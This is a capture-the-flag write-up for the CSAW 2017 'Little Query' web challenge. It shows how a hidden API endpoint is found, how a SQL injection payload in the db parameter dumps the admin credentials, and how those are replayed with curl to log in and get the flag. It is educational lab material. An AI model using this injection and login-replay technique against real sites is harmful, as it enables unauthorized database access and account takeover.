CSAW CTF Qualification Round 2017 - Little Query [200]

Little Query - 200 Points

littlequery.chal.csaw.io

First of all, maybe you need some reference before to solve this problem:

SQL Injection

There is only the "Main Page" and a button "Sign In"

Open the source Code

<!--
<div class="col-md-4">
    <h2>For Developers</h2>
    <p>Check out our <a href="/api/db_explore.php">API</a></p>
</div>
-->

Add " /api/db_explore.php " to the main website url.

the link began:

" littlequery.chal.csaw.io/api/db_explore.php "

output:

" Must specify mode={schema|preview} "

Change the mode=schema " ?mode=schema "

" littlequery.chal.csaw.io/api/db_explore.php?mode=schema "

output:

" {"dbs":["littlequery"]} "

Add "&db=littlequery "

" littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery "

output:

" {"tables":["user"]} "

Last, add " &table=user "

" littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery&table=user "

output:

" {"columns"L{"uid":"int\(11\)","username":"varchar\(128\)","password":"varchar\(40\)"}} "

From here we just knew the variable and length of username and password.

From " ..?mode=schema.. " change it to be " ..?mode=preview.. "

" littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery&table=user "

Aww.. snap!.

output:

" Database 'littlequery' is not allowed to be previewed "

Try to inject the parameter " db=littlequery " to be " db=coba "

" littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=coba&table=user "

output:

" 'coba'.'user' doesn't exist. "

From here we can notice that the query is

" `SELECT * FROM &db . $table``` "

Now, can figure out and do the exploit

" http://littlequery.chal.csaw.io/api/db\_explore.php?mode=preview&db=littlequery`.`user\`--%20-&table= "

output:

" \[{"uid":"1","username":"admin","password":"5896e92d38ee883cc09ad6f88df4934f6b074cf8"}\] "

Now open " http://littlequery.chal.csaw.io/login.php "

Take the "cookies", when you access use "admin" and the "5896e92d38ee883cc09ad6f88df4934f6b074cf8"

Intercept:

  • Tamper data \(Mozilla\)

or

  • Burp Suite

Copy the cookies:

" PHPSESSID=vcfdft70ucstqe30afs9dtv2 "

And login it use cURL, because the Javascript block you to access even you have the username : "admin" the password "5896e92d38ee883cc09ad6f88df4934f6b074cf8"

" curl -X POST http://littlequery.chal.csaw.io/login.php --data "username=admin&password=5896e92d38ee883cc09ad6f88df4934f6b074cf8" -v Set-Cookie: PHPSESSID=vcfdft70ucstqe30afs9dtv2; path=//query.php "

flag:{mayb3_1ts_t1m3_4_real_real_escape_string?}

results matching ""

    No results matching ""